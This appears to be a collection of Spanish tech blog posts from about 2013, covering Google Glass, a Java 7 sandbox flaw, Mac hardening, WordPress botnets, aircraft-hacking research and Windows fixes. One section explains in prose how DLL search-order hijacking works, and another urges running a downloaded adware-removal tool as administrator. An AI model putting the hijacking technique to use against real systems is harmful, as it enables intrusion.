Google Glass a la venta en 2014.


Llevamos ya bastante tiempo hablando de ellas. No hay semana que no salgan a la luz nuevas características de las gafas de Google, posiblemente el producto tecnológico del año.

Pero ya será del que viene, ya que el CEO de los de Mountain View, Eric Schmidt, ha confirmado que saldrán a la venta en 2014 en una entrevista a la radio de la BBC.

El programa de radio World at one de la BBC es el que ha dado la exclusiva. Las Google Glass se empezarán a comercializar el año que viene, aunque Eric Schmidt no ha especificado el mes en el que verán la luz.

Y es que van con cierto retraso, por eso todavía no se puede anunciar el día exacto que saldrán a la venta. De hecho, se especulaba con que a principios de año las podríamos ver ya en los escaparates, pero esto no va a ser posible.  

Parece que Google no quiere sacar un producto a medio hacer, y personalmente, creo que hacen bien. Las prisas no son buenas y menos en un mundo como el de la tecnología.

Gracias a que han tenido que presentar las Google Glass a la FCC (la Comisión Federal de Comunicaciones) para su homologación, ya tenemos las especificaciones de las "gafas del futuro" tal y como publica The Verge:

Especificaciones:

  • Pantalla: 640×360 («equivalente a a un monitor de 25" a 3m»)
  • Cámara de 5 megapíxeles con vídeo 720p
  • 16 GB de almacenamiento (con 12 GB libres)
  • Sincronización con la nube de Google (obviously)
  • Batería: un día «de uso normal»
  • Micro USB para recarga de la batería
  • Bluetooth
  • Wi-Fi 802.11b/g
  • Software para teléfono inteligente Android 4.0.3 (GNU/Linux)
  • GPS y SMS a través del «teléfono inteligente asociado»

Aca puedes ver un video del unboxing:


Nueva vulnerabilidad en Java 7 (cliente y servidor).


Se ha publicado nuevo informe sobre una nueva vulnerabilidad en Java 7, además de una prueba de concepto (PoC).

El nuevo fallo afecta a todas las versiones de Java SE 7, incluyendo la recientemente lanzada versión 1.7.0_21-b11. La vulnerabilidad puede ser utilizada para lograr pasar completamente la seguridad de Java sandbox y por lo tanto acceder al sistema destino. La explotación con éxito en un navegador web requiere linteracción con el usuario adecuado.

Lo que es más interesante es que esta nueva vulnerabilidad está presente en JRE/JDK y también en el recientemente anunciado Server JRE. Quienes se preocupan por la viabilidad de la explotación en un entorno de servidor pueden consultar la Sessión 3-8 de "Instrucciones de codificación segura para una aplicación Java".

Los componentes y API potencialmente propensas a la ejecución de código no confiable son:

  • Implementación del intérprete XSLT,
  • La persistencia a largo plazo de los componentes JavaBeans,
  • RMI y LDAP (RFC 2713),
  • Muchas implementaciones de SQL.
En abril 2012, Adam Gowdiak de Security-Explorations informó sobre la vulnerabilidad a Oracle Corporation señalando los múltiples problemas de seguridad en Java SE 7 y en la Reflection API. Luego de un año de espera se decidió hacerlo público.

Por este y muchos otros motivos seguimos recomendando a los usuarios desactivar o desinstalar Java en el navegador.

Un año de prisión y multa de $650,000 dólares para atacantes a Sony.


Cody Kretsinger, del grupo LulzSec admitió haber participado en un ataque a los sistemas de Sony Pictures Entertainment, y fue condenado a un año de prisión y a pagar una multa de U$S605.663 por los daños causados.

El joven de 25 años, cuyo nombre en línea era "Recursion", se declaró culpable de los cargos de conspiración y deterioro no autorizado de una computadora protegida como parte de un acuerdo.

Tras su salida de la cárcel , el hacker deberá cumplir con 1,000 horas de servicio comunitario y con una detención domiciliaria.

Kretsinger dijo al juez que accedió al sitio web de Sony Pictures, obtuvo información y la otorgó a otros miembros de LulzSec, quienes la publicaron en la página del grupo hacktivista y en Twitter.

La Oficina de la Fiscalía en Los Angeles, dijo que Kretsinger se declaró culpable en abril pasado del ataque en el que los hackers violaron la página web de Sony Pictures y robaron datos personales, incluidos los nombres, direcciones, números de teléfono y direcciones de correo electrónico de miles de clientes de Sony, que posteriormente distribuyeron a través de internet.

Seguridad para tu Mac.


Aunque se dice que el sistema operativo de Mac es generalmente muy seguro, hay cosas que se pueden hacer para asegurarse de que se tiene un sistema totalmente bloqueado.

Estos trucos y consejos de Mac Tricks and Tips sirven para asegurarse de que no se deja ninguna puerta trasera abierta inadvertidamente. No es necesario aplicarlos a todos, pero sin embargo cuanto más se aplican más se protege el sistema.

1. Habilitar el Firewall

Aunque puede haber mejores firewalls el de Mac es suficiente para la mayoría de las necesidades de los usuarios. Activar el firewasll es una de las cosas más básicas que se pueden hacer para protegerse. Puede activarlo desde las Preferencias del Sistema.



2. Cifrar la información con FileVault 

FileVault es un sistema de cifrado incorporado en Mac desde su versión 10.3. Esta aplicación cifra los datos on the fly, lo que significa que todos los datos que se almacenan en una unidad son inaccesibles si la unidad se retira o se lee desde otro equipo. Esto es muy útil si el Mac o su disco son robado.



Tener en cuenta que FileVault puede ralentizar casi imperceptiblemente equipo y que si se olvida la contraseña, no se podrán descifrar los datos.

3. Mantener actualizado el software

La App Sore informa automáticamente cuando hay actualizaciones y cuándo deben aplicarse. Esto es especialmente importante en lo que respecta a las actualizaciones de seguridad y actualizaciones de Java. Cada actualización de software corrige errores y agujeros en el sistema para asegurarlo

4. Permitir aplicaciones sólo de fuentes de confianza

El último sistema operativo de Apple incluye una aplicación de llamada GateKeeper que asegura que las aplicaciones se han firmado y que provienen de fuentes de confianza.

Esto significa que las aplicaciones no pueden provenir de desarrolladores no identificados y por lo tanto no se ejecutan en el Mac. Todas las aplicaciones de la App Store se firman para garantizar que son seguros y la mayoría de las aplicaciones de terceras partes, que no se venden en la tienda de aplicaciones, están firmadas por los desarrolladores de confianza. Habilite al menos la segunda opción para garantizar que aplicaciones que se ejecutan son de confianza.



Si usted es demasiado estricto puede activar la primera opción.

5. Deshabilitar Java

Java está lleno de agujeros de seguridad y en general es un dolor de cabeza y no permite garantizar que no se ponga en peligro el sistema. Si usted no utiliza Java, apáguelo. Para desactivarlo, abra las preferencias del navegador web que utilice desmarque la pestaña "Enable Java", por ejemplo en Safari.



Adicionalmente se puede tratar de usar páginas web con Java lo menos posible.

6. Hacer copias de respaldo de los datos

Una característica simple, pero útil, es siempre tener una copia de seguridad de sus datos. Esta es una característica de seguridad para asegurar de que siempre se tendrán los datos cuando se los necesite.
Time Machine es un software de backup desarrollado por Apple para hacer copias de seguridad. Viene incluido con el sistema operativo Mac OS X y fue introducido con el lanzamiento de la versión 10.5. Aquí se puede ver un tutorial de uso.

7. No utilizar la cuenta de Administrador

Una cuenta de administrador (root) tiene muchos privilegios y por eso en su lugar se debe crear una cuenta de usuario normal con menos "poderes". Usted todavía será capaz de hacer todas las cosas que quiera en su Mac y tendrá una capa adicional de seguridad para detener cualquier tipo de ataque de aplicaciones dañina. Adicionalmente evitará poner en riesgo su equipo ante un error involuntario.

Para crear una nueva cuenta, abra Preferencias del Sistema y seleccione "Grupos y usuarios" desde el panel. En la parte inferior añada una nueva cuenta "estándar" y rellene los datos solicitados.



8. Desactivar inicio de sesión automático

Si tienes un MacBook se debe desactivar el acceso automático para evitar que cualquiera pueda iniciar su Mac y tener acceso a sus archivos.

Dentro de las opciones de inicio de sesión de los usuarios y en el panel de preferencias de grupos, apague el inicio de sesión automático. Esto asegura que se tiene que escribir una contraseña para acceder a su cuenta de usuario.

9. Requerir una contraseña en el Screen Saver

Al igual que con el consejo anterior, se debe establecer una contraseña para desbloquear el sistema o para salir del protector de pantalla. Esto significa que cualquier persona que acceda al Mac, necesitará la contraseña para acceder a sus archivos.

Esta configuración de seguridad está habilitada en el panel Seguridad y privacidad dentro de Preferencias del Sistema y se debe activar la casilla de verificación para requerir una contraseña al desactivar el protector de pantalla.

10. Cierre de sesión automático

Otro consejo de seguridad en la línea con los anteriores. El cierre de sesión automático significa que si se deja la Mac desatendida durante demasiado tiempo, la sesión se cerrará y que se requerirá una contraseña para acceder.

11. Deshabilitar los servicios de localización

Los servicios de localización permiten a ciertas aplicaciones localizar el Mac en base a la información de un GPS que este tiene. Si no se desea que la gente sepa dónde está usted, puede desactivar esta función desde  el panel de Seguridad y Privacidad en las Preferencias del Sistema.



Este consejo también aplica para otros dispositivos como el iPhone y el iPad.

12. Vaciar la papelera de forma segura

Cuando se elimina cualquier archivo, sólo se marca un puntero para que el archivo deje de estar "accesible" normalmente. Esto significa que los bits y los bytes que componen el archivo todavía están presentes en el disco y algunas aplicaciones pueden leer estos datos y reconstruir el archivo.

Se puede tener una seguridad adicional cuando se borra desde Finder, utilizando la opción "Secure Empty Trash" desde la barra de menús. Esto sobrescribe los archivos con datos en blanco para que los datos originales no se pueden recuperar.Conclusión Muy muchos métodos para asegurar un sistema y quizas no se puedan cumplir con todos ellos pero,al seguir algunos de ellos. marcará una diferencia importante.

Google prepara su propio antivirus.


Los de Mountain View quieren posicionarse en otro sector del mundo de la informática que curiosamente mueve muchísimo dinero, el de los antivirus. Google está trabajando en un proyecto que se llama CAMP (Content-Agnostic Malware Protection) y que promete proteger nuestros dispositivos del 99% de los virus que circulan por la red, mediante un análisis que tarda tan solo 130 milisegundos. 

Es evidente que el sector de los antivirus es un mundo muy goloso para cualquier empresa, ya que se mueve muchísimo dinero. Para que os hagáis una idea, en 2012 generó aproximadamente unos 90.000 millones de dólares, repartidos entre todas las empresas que se dedican a proteger los equipos de los usuarios.

Y claro, después de empezar con los buscadores, seguir con el correo electrónico y meterse de lleno en el mundo de los sistemas operativos móviles, aparte de ser propietaria de Chrome, uno de los navegadores más utilizados del mundo, prácticamente solo les quedaba producir un antivirus universal.

Y eso es lo que han hecho. En un movimiento lógico teniendo en cuenta que son los dueños de la mayor base de datos del mundo, van a crear, según sus propias palabras, el mejor antivirus del mundo.

Gráfica que compara CAMP con los otros antivirus

CAMP


Son las siglas de Content-Agnostic Malware Protection y nace para cubrir las actuales carencias de los antivirus de hoy en día. Si bien ahora estos antivirus se basan sobre todo en el análisis de los contenidos descargados de la web, Google pretende analizar todo el contenido de cualquier web en un momento.

Se articula en forma de cliente-servidor, con una extensión del navegador Chrome que analiza el 70% de los contenidos y otro alojado en la nube de la compañía que se encarga de un examen más pormenorizado.

También trabajará con un sistema de listas negras y blancas. Es decir, tendrá una base de datos con las páginas web 100% seguras y otra con los site sospechosos de alojar virus.

En este último caso, Google analizará a fondo la web y la bloqueará si fuese necesario. Evidentemente también se contará con la complicidad del usuario que podrá reportar a Google mediante un solo clic cualquier amenaza que vea.

Según el propio informe de Google los actuales antivirus tienen una tasa de detención del 30%, mientras que ellos llegarían al 99%, lo que si fuera totalmente cierto podría poner a en peligro a algunas empresas que viven de ello.

¿Qué os parece el nuevo antivirus que va a sacar Google? Queremos saber vuestra opinión.

Debian 7 se espera en la primera semana de mayo.


Ahora sí hay una fecha oficial para el lanzamiento de Debian 7 “Wheezy”: será entre el 4 y el 5 de mayo.

Neil McGovern, en nombre del equipo de desarrollo del proyecto, así lo ha comunicado de forma oficial en el sitio lists.debian.org. Fecha que sólo cambiará si aparece un problema crítico.

Si finalmente nada se tuerce, la nueva entrega de la distribución “madre” de muchas otras, debutará 27 meses después de su predecesora, Debian 6 “Squeeze”, lanzada en febrero de 2011. Tiempo en el que han pasado muchas cosas en el mundo de la tecnología y en el de GNU/Linux.

Debian se caracteriza por sus ciclos largos de desarrollo en aras de la estabilidad, lo que hace que la distribución vaya algunos pasos por detrás de otras iniciativas, que suelen incorporar “lo último”, tanto en soporte de hardware como en programas, en particular los entornos de escritorio.

Debian 7 “Wheezy” viene con nuevos controladores, soporte UEFI y un nuevo instalador que facilita como nunca el proceso para tener la distribución funcionando en nuestro equipo. Muchos incondicionales de Debian esperan con ilusión el debut de la nueva entrega.



DLL-order hijacking.


Cuando un sistema Windows requiere cargar una DLL, la busca en los siguientes directorios por orden:

  • El directorio donde reside la imagen del proceso que carga la DLL; por ejemplo, si el ejecutable reside en C:\WINDOWS, intentará cargar la DLL desde ese directorio.
  • El directorio actual.
  • El directorio de sistema (normalmente C:\WINDOWS\SYSTEM32).
  • El directorio de sistema para 16-bit (normalmente C:\WINDOWS\SYSTEM).
  • El directorio de Windows (normalmente C:\WINDOWS).
  • Los directorios listados en la variable de entorno PATH.
Este hecho se puede explotar ubicando una DLL maliciosa con el mismo nombre que la DLL legítima en una posición más prioritaria dentro del orden de búsqueda anterior. Por ejemplo, si se sabe que un proceso ubicado en C:\WINDOWS carga la DLL foo.dll, que normalmente está ubicada en C:\WINDOWS\SYSTEM32, y se ubica una versión maliciosa de la DLL con el mismo nombre foo.dll en C:\WINDOWS, que está antes en el orden de búsqueda para la carga, se cargará la versión maliciosa, y no la versión legítima. Este ataque es conocido como «DLL-order hijacking» (algo así como «secuestro en el orden de la DLLs»).

Para tratar de contrarestar este tipo de ataques, Microsoft introdujo en el registro la familia de claves KnownDLLs, que permiten fijar "a fuego" la ruta absoluta de ciertas DLLs, para que sólo puedan cargarse desde sus ubicaciones legítimas.

Contenido completo en fuente original Security Art Work

Como eliminar Iminent

En el post de hoy vamos a tratar de dar solución a un problema cada vez más común que es eliminar iminent de nuestro sistema.

Primero ¿Que es Iminent?

Iminent es un programa que ofrece emoticones, guiños, avatares, gratis para programas de mensajería instantánea, correo electrónico y redes sociales pero, a cambio, inunda a los usuarios de publicidad y ralentiza el ordenador. 

Puede instalarse silenciosamente cuando instalamos otros programas y resulta muy complicado de eliminar. 



(en la imagen podemos apreciar como silenciosamente se instala Iminent junto a su toolbar en la instalación del programa Ares, en este caso un usuario atento debería desmarcar las opciones para evitar que Iminent ingrese al sistema.)

Iminent no es un virus exactamente, es una aplicación que se instala en nuestros navegadores y cambia nuestra página de inicio, añade un toolbar y un plugin para añadir emoticones a nuestros chats.

La forma como Iminent se comporta en nuestro computador lo convierte en una aplicación potencialmente no deseada, además de que tiene un comportamiento intruso ya que en algunos casos no se deja desinstalar como también, si se desinstala sigue teniendo actividad en nuestro navegador.

En muchos foros hemos visto como se ofrecen soluciones tediosas en donde el usuario debe realizar muchos pasos y mismo así no consigue librarse de Iminent.

Hoy te traemos una solución, fácil, sencilla y 100% efectiva que se llama Iminent Killer.

Esta aplicación funciona para los navegadores “Internet Explorer, Firefox, Google Chrome” y si en tus navegadores tienes marcadores o favoritos realiza una copia (backup) de ellos antes de ejecutar la aplicación, los navegadores serán configurados a su estado inicial y en algunos se borraran los marcadores o favoritos.

Sigue los siguientes pasos:

1) Descarga Iminent Killer desde aquí: Descargar

2) Descomprime el archivo usando Winzip o WinRar.

3) Ejecuta Iminent Killer (en Windows Vista / 7 / 8 da click con el botón derecho y ejecutar como administrador)

4) Se abrirá la ventana de Iminent Killer, escribir 1 y presionar "Enter"

5) Cuando se abra la pantalla de "Restablecer Configuración de Internet Explorer" marcar la opción "eliminar configuración personal" y presionar el botón "Restablecer".

6) Se abrirá una pequeña ventana la cual dice: "Se esta restableciendo la configuración de Internet Explorer" y debajo habrá cuatro tildes de color verde, allí damos click en el botón "cerrar".

7) Finalmente escribimos 2 y presionamos "Enter" para salir de Iminent Killer.


Listo! con esto habremos eliminado a Iminent de nuestro sistema y nuestro navegadores estarán libres de el!


De cada 10 ordenadores casi 3 no tienen antivirus.


Microsoft ha publicado los resultados de la décimocuarta edición del informe Security Intelligence Report que, además de analizar cuáles son las amenazas más extendidas, recoge el uso que se hace de los antivirus.

Los datos revelan que de cada diez ordenadores analizados, un 2,5 no han utilizado nunca ningún tipo de antivirus, lo que supone un riesgo 5,5 veces mayor de ser infectado. 

El uso de antivirus, asegura Microsoft, es fundamental, ya que además de proteger contra virus, elimina infecciones y salvaguarda la privacidad de las personas.

“Con esta nueva edición del informe, desde Microsoft queremos instar a las personas a instalarse y utilizar un Antivirus, siempre actualizado, que proteja sus ordenadores”, ha dicho Tim Rains, director de Trustworthy Computing de Microsoft.

La compañía de Redmond asegura haber detectado y eliminado correos electrónicos con adjuntos malicisoso en más de tres millones de ordenadores durante el cuarto trimestre del año.
 Durante este periodo destacó un malware denominado Keygen, que fue detectado casi siete millones de veces.

Microsoft Security Intelligence Report también recoge datos del mercado español, donde las tendencias más detectadas fueron el software no deseado (26%), Adware (32%) y Troyanos (22). Win32/DealPly que atacó a un 17% de los ordenadores fue en este periodo el tipo específico de Adware más común en España.

Que el periodo de prueba haya acabado, el software no esté actualizado o que haya sido desinstalado por un ataque malicioso son algunas de las razones por las que un usuario puede no tener protegido su ordenador.

Para Rains, “independientemente de si se utiliza un software gratuito o de pago, la importancia de tener un Antivirus no puede subestimarse”, comentó Rains.

Microsoft publica SIR dos veces al año, un estudio que informa sobre los riesgos globales más actuales con el objetivo de que tanto usuarios como organizaciones estén más protegidos.

Los datos de este informe en concreto pertenecen a la segunda mitad de 2012 e incluyen información sobre amenazas a través del análisis de más de 1.000 millones de ordenadores en todo el mundo.

Windows Blue no tendria la interfaz Metro.


Parece que Microsoft está suavizando su postura. Si antes negaba que fuera a cambiar su estrategia y afirmaba que la pantalla de inicio Metro no desaparecería de las nuevas versiones, ahora se especula con que Windows 8.1 podría llevar una opción para desactivarla, aunque esta opción no vendría activada por defecto. Lo que sí es seguro es que traerá algunos cambios importantes como la mejora de la multitarea.

Este fin de semana se ha venido hablando de un rumor que está basado en parte del código de la actualización que se filtró el mes pasado y donde una línea incluye la supresión de la pantalla de inicio.

Microsoft no ha dicho nada al respecto, por lo que no se puede asegurar con rotundidad que lo vayan a implementar, pero sí parece que al menos se lo están planteando.

Y todo es debido a que la nueva pantalla de inicio inaugurada con Windows 8 no es del gusto de muchísimos usuarios y empresas, sobre todo los que utilizan dispositivos que no son táctiles, ya que creen que la pantalla de inicio anterior, es decir el escritorio, es mucho más fácil de usar cuando se utiliza un ratón.

De hecho, hasta Microsoft Office se sigue utilizando como una aplicación de escritorio en el nuevo Windows 8, lo que refuerza aun más la opinión de que para los equipos de sobremesa y portátiles que no son táctiles, el anterior diseño del sistema operativo de Microsoft era mucho mejor.

Windows 8

 

Cambios en Windows 8


Se lleva tiempo hablando de Windows 8.1, o Windows Blue, como se le llama desde Redmond. Ya han salido bastantes rumores a lo largo de los últimos meses acerca de cómo será y cuándo saldrá.

Lo cierto es que parece que, a pesar de la posibilidad de que se acceda directamente al escritorio, en Microsoft quieren reforzar la idea de la interfaz Metro, lo que implica contentar a todo el mundo. Tanto a los que están a favor, como los que están en contra.

Se quiere mejorar la multitarea en la interfaz UI incluyendo la posibilidad de elegir la vista de una aplicación cuando se abra si ya hay otra en funcionamiento. También habrá una mayor integración con Skydrive, incluyendo una aplicación que facilite la navegación táctil por los archivos locales y los almacenados en la nube, como si estuvieran guardados todos en el mismo sitio.

Microsoft también quiere mejorar el uso con el ratón de Windows 8. Incluirá un nuevo botón en el lado izquierdo de la pantalla que permitirá acceder directamente a una lista de aplicaciones y que introducirá un filtro para ir a las más utilizadas.

Parece ser que quieren realizar una especie de “botón de inicio” al estilo Metro. La función de búsqueda también permitirá acceder a los resultados de la web, y no solo a los del ordenador como hace actualmente.

Como vemos son cambios que permiten mejorar un poco la experiencia de Windows 8 y que esperemos que funcionen, en vista de que nos tendremos que acostumbrar, sí o sí, al nuevo diseño de Windows.

Ataque distribuido por fuerza bruta infecta blogs de Wordpress.

Hay un ataque en marcha contra blogs Wordpress que está construyendo una botnet considerablemente grande infectando blogs no seguros.

El ataque consiste básicamente en usar fuerza bruta para adivinar la contraseña de administrador de cada instalación. Una vez conseguida, el malware se instala en el blog creando un nuevo usuario. Desde ahí empezará a atacar a otros blogs Wordpress por fuerza bruta para infectarlos.

El malware usa una lista de unas 1.000 combinaciones de usuario y contraseña, las más comunes. Son pocas comparadas con todo el espacio de combinaciones posibles, pero al ser las más comunes es perfectamente posible que infecten suficientes blogs como para que la botnet tenga un tamaño importante (un mínimo de 90.000 IPs según algunos informes).

De momento, los blogs infectados no están haciendo nada más allá de buscar otros blogs, así que no están causando demasiados problemas adicionales a los usuarios. Quienes sí lo están pasando peor son los proveedores de hosting, que en algunos casos están viendo cómo su tráfico saliente se dispara. Muchos han tomado medidas de seguridad adicionales, como bloquear el acceso a todos los paneles de administración de Wordpress salvo a ciertas IPs específicas, de forma que el usuario tiene que comunicar al hosting su IP para poder acceder al blog.

Si creéis que podéis haber sido infectados, lo más recomendable es borrar cualquier usuario desconocido y revisar la instalación para buscar archivos maliciosos. En última instancia, siempre podéis borrar todos los archivos y hacer una instalación limpia para evitaros problemas (los posts, etiquetas y demás se guardan en la base de datos, así que no los perderéis).

Para el resto, recordad los consejos a la hora de crear contraseñas seguras o configurar la autenticación en dos pasos. También podéis usar plugins como Login Security Solution para bloquear ataques de fuerza bruta en vuestros servidores. Y, por supuesto, seguir los consejos de seguridad de Wordpress. Se puede ver una presentación sobre la seguridad de Wordpress de Tony Perez.


Actualizacion de Microsoft impide que Windows 7 se inicie.


Como Microsoft nos tiene acostumbrados desde hace décadas continua con la creación de software lleno de problemas, esta vez como todos los segundos martes de cada mes, Microsoft lanzo su ronda de parches para todos sus sistemas operativos Windows y Windows Server pero esta vez uno de los parches en vez de corregir problemas añadió mas problemas aun, lo que Richard Stallman llamaria "La funcionalidad de no funcionar".

Se trata de una actualización de numeración KB2823324 que provoca que Windows 7 no sea capaz de iniciarse. El mensaje de error que se mostrará tendrá un ID de suceso 51 o distintas numeraciones de error (0xc000021a). Adicionalmente el antivirus Kaspersky también dejará de funcionar.

Si tienes configurado tu sistema para que instale automáticamente las actualizaciones de Windows Update probablemente ya la tendrás instalada; si es el caso, os explicamos cómo arreglar vuestro equipo.

Es importante saber dónde comprobar si tenemos la actualización instalada o no. Para ello seguiremos los siguientes pasos:
  • Abrimos el menú de Inicio
  • Abrimos el panel de control
  • Hacemos clic en “Programas”
  • Hacemos clic en “Ver actualizaciones instaladas”
En la lista que aparece deberemos buscar la actualización con la numeración que indiqué en el segundo párrafo.

Si habéis instalado la actualización pero no habéis reiniciado el equipo

En el caso de que hayáis instalado la actualización pero no hayáis reiniciado el equipo, estaréis a tiempo de repararlo. Para ello:
  • Abrimos el menú de Inicio
  • Abrimos el Panel de Control
  • Hacemos clic en “Programas”
  • Hacemos clic en “Ver actualizaciones instaladas”
  • Buscamos la actualización con numeración KB2823324
  • Pulsamos en el botón “Desinstalar”
Si queréis utilizar un único comando dentro de una interfaz de línea de comandos, será el siguiente el que hay que escribir:
Wusa.exe /uninstall /kb:2823324 /quiet /norestart
Si ya habéis reiniciado vuestro equipo

En este caso nos estaremos enfrentando a un equipo que no podemos iniciar, de manera que no podemos utilizar ese sistema para poder repararlo. Deberemos acudir a un disco de recuperación de Windows 7 o, si no lo hemos creado, a un disco de instalación del sistema operativo (o a las herramientas de recuperación que el fabricante haya dejado en una partición de vuestro disco duro).

Otra posible opción es intentar iniciar el equipo manteniendo pulsado el botón F8 para acceder a las herramientas de recuperación del sistema. Este método funcionará siempre que conozcamos la contraseña local del sistema.

Una vez lleguemos a la ventana de la imagen, simplemente pulsamos en “Restaurar Sistema“ y marcamos el último punto de restauración (cada vez que se instalan actualizaciones se crean puntos de restauración automáticamente).

Por otra parte, podemos ejecutar dos comandos desde el sistema, si no funciona Restaurar Sistema, no lo tenemos activado o hemos eliminado los puntos de restauración. En las mismas herramientas de recuperación, pulsamos en el último enlace y escribimos los siguientes comandos:
dism /image:C:\ /get-packages
dism /image:C:\ /remove-package /PackageName:Package_for_KB2823324~31bf3856ad364e35~x86~~6.1.1.1
Como es de esperar, de todos modos, Microsoft está investigando el problema, y además la actualización afectada ya no se distribuye mediante Windows Update.

Cómo hackear un avión en vuelo.


Hugo Teso, consultor en materia de seguridad en la firma alemana N. Runs, se presentó el pasado miércoles en la conferencia Hack In the Box en Amsterdam, su charla "how to remotely attack and take full control of an aircraft". Con su Android en la mano y afirmó con una seguridad pasmosa que era capaz de hackear un avión en pleno vuelo con ayuda de su smartphone.

Bum. Silencio en la sala y preocupación evidente entre los asistentes, en especial los que debían regresar a casa en avión. Pero la imagen de terrorista en potencia se desvaneció rápidamente cuando el joven analizó en detalle los pormenores de su inquietante descubrimiento: "lo que vais a ver ahora es una demostración práctica de cómo tomar total control de un avión de forma remota", afirmó, "es el fruto de mis tres años de investigación". Un tipo serio y riguroso, pero... ¿es real lo que defiende?

Este consultor había abierto la caja de los truenos. ¿Puede derribarse realmente un avión empleando únicamente un móvil Android? La teoría, tal cual fue expuesta por Teso [PDF], así lo afirmaba: una combinación de fallos de seguridad en el software que gobierna las aeronaves y saboteando el protocolo empleado para enviar información a los vuelos comerciales, permitía enviar señales de radio de forma que los aviones ejecutaran órdenes aleatorias, como variar la altitud, girar e incluso modificar el contenido de la pantalla del piloto. Imaginen el panorama a 30.000 pies de altura. "Puedes utilizar este sistema para modificar prácticamente todo lo relacionado con la navegación del avión", afirmó Teso ante el estupor de los asistentes.

Un móvil Android y componentes de eBay


Y lo cierto es que, aunque sorprendente, la noticia no sonará a nueva a los expertos en seguridad, que ya habían alertado de las deficiencias en materia de seguridad de los protocolos. Pero no creáis que la presentación de Teso estuvo exenta de dramatismo: con un smartphone Android y algunos componentes adquiridos en eBay, anunció que era perfectamente capaz de derivar la trayectoria de un avión moderno, y para colmo, si el piloto automático estaba activado, los pilotos ni se enterarían del cambio de ruta.

ComputerWorld le pone el toque dramático al asunto, por si todavía lo necesitara, al indicar que Teso sería capaz de disparar la adrenalina de los pasajeros haciendo saltar las máscaras en pleno vuelo. Y todo desde su móvil.



Pero posiblemente lo más inquietante de la demoledora presentación de este consultor es que ninguno de los aludidos han corrido a desmentir sus palabras o a exigir una rectificación: Forbes ha contactado tanto con la EASA como la FAA y todavía no se han posicionado con este asunto.

La buena noticia, si es que piensas tomar un vuelo dentro de poco, es que los pilotos siempre tendrán la última palabra a los mandos del avión. Eso sí, sin son conscientes que están siendo víctimas del ataque de un hacker.

Instalar Windows desde una memoria USB / Pendrive 100% seguro y funcional.



Hoy les traemos un pequeño tutorial para instalar Windows desde una memoria USB / pendrive, no necesitas ningún programa solo MS-DOS.

Esto es realmente útil para instalar el sistema operativo en dispositivos que no cuentan con lectora de DVD, como por ejemplo las netbooks.

Antes que nada quiero aclarar que los pasos aquí citados han sido probados por mi y funcionan al 100%.
En mi caso instale un Windows 7 Ultimate en una netbook Sony Vaio sin ningún tipo de problema.

Cualquier duda o consulta lo pueden hacen enviando un correo a consultas.synuxit@gmail.com

¿Que necesitamos?:

1) Necesitaremos un pendrive de al menos 4GB vacío.
2) CD/DVD de Windows o su imagen .iso .

Ahora manos a la obra:

1) Insertar la memoria USB / Pendrive en el ordenador.

2) Abrir MS-DOS (Inicio --> Todos los programas --> Accesorios --> Símbolo del sistema o Inicio --> ejecutar y escribir CMD.

3) Dentro de MS-DOS escribir lo siguiente: (sin las comillas)
  • "diskpart" y luego presionar "enter".
  • "list disk" y luego presionar "enter".
  • "select disk "numero de disco" Ej: select disk 1 (acá presten mucha atención en seleccionar el numero que corresponde a la memoria USB / pendrive, se darán cuenta fácilmente por el tamaño del pendrive, si eligen el equivocado pueden perder toda la información).
  • "clean" y luego presionar "enter".
  • "create partition primary" y luego presionar "enter".
  • "active" y luego presionar "enter".
  • "format fs=fat32 quick" y luego presionar "enter".
  • "assign" y luego presionar "enter".
  • "exit" y luego presionar "enter".

4) Por ultimo copiar todo el contenido del CD/DVD o imagen .iso dentro de la memoria USB / Pendrive, copien y peguen tal cual esta en el CD/DVD o imagen .iso (en el caso de la imagen .iso deben descomprimirla primero), sin crear ninguna carpeta.

5) Reinicien el ordenador con la memoria USB / Pendrive dentro y deberá salir la pantalla de instalación.

Si NO aparece la pantalla de instalación deben entrar en la bios y decirle que haga boot desde la memoria USB / Pendrive.

Cuando se inicia el ordenador puede ser que nos pregunte desde donde hacer boot allí presionar F11 o F12 (generalmente).

Para entrar en la bios, cuando inicia nuestro ordenador presionar F2 o Supr (generalmente) y entraremos en la bios.

Bueno esta es la manera más "limpia" de instalar Windows desde una memoria USB / pendrive sin la necesidad de instalar programas para realizar esto.



Se detecta malware de Bitcoin que se propaga por Skype.


Bitcoin, la moneda que se está popularizando a pasos agigantados, ya está siendo presa de malware con el fin de fabricar más dinero de esta moneda.

Kaspersky ha detectado que este malware se está propagando a través de Skype de usuarios de España, Italia, Costa Rica, Alemania, Rusia y Ucrania.

Cuando algo se populariza y es rentable económicamente hablando, muchas personas intentan sacar beneficio de ello con maneras no del todo éticas e incluso no del todo legales. Y si ese algo es una moneda con un valor que no es controlado directamente por nadie, la golosina es mucho más apetecible.

Esto es lo que ha pasado con Bitcoin, la nueva moneda, que puede cambiar, o no, la economía a partir de ahora. Kaspersky Lab ha descubierto un malware que se extendía a través de Skype que tenía como objetivo aprovechar los ciclos de CPU de los equipos que se infectaban para usarlos en minería de Bitcoin, es decir, el proceso de generación de esta moneda virtual.

Por Skype los hackers conseguían crear dinero


A parte de los Bitcoins que ya hay en curso en todo el mundo es posible crear más monedas de este dinero en un proceso que se conoce como “minería”. Para evitar que el valor caiga en demasía al fabricar demasiada moneda, el proceso está controlado mediante un sistema que utiliza ciclos de CPU de computadoras de todo el mundo para resolver algoritmos criptográficos y “fabricar” más moneda y, por estas contribuciones, un usuario puede llegar a percibir hasta 25 Bitcoins.

Evidentemente, si un único usuario consigue que varios equipos trabajen para él, será capaz de ir creando cada vez más moneda.
Es por ello que ciertos hackers han credo un malware que consigue que miles de usuarios colaboren con sus ordenadores, sin saberlo, en este proceso. Este malware ha sido descubierto por Kaspersky y ya se puede saber cómo funcionaba.

El código malicioso circulaba a través de Skype y cuando un usuario pinchaba en él, ponía a trabajar su CPU para el hacker de turno. Así conseguía ganar este dinero virtual que, no lo olvidemos, se puede utilizar para comprar bienes materiales sin ningún problema. Es decir, tenían una fábrica de moneda utilizando ordenadores ajenos para ello.

Para hacernos una idea del éxito que tuvo basta decir con que la url de bit.ly tras la cual se alojaba este malware recibía una media de 2.000 clics por hora, con lo que suponemos que quien se haya aprovechado de ello, puede ser bastante más rico, tanto virtualmente como literalmente, de lo que era hace unos días.

Windows 9 podria ser lanzado el próximo octubre.


El mes pasado ya anunciamos que Windows 9 podría ser lanzado el mes de octubre del año próximo. A día de hoy estos rumores se incrementan y según informa DigiTimes, Microsoft se encuentra trabajando en un nuevo sistema operativo de próxima generación, que puede denominarse Windows 9 y el cual puede ser lanzado en la fecha citada en el titular de la noticia, o sea este mismo año.

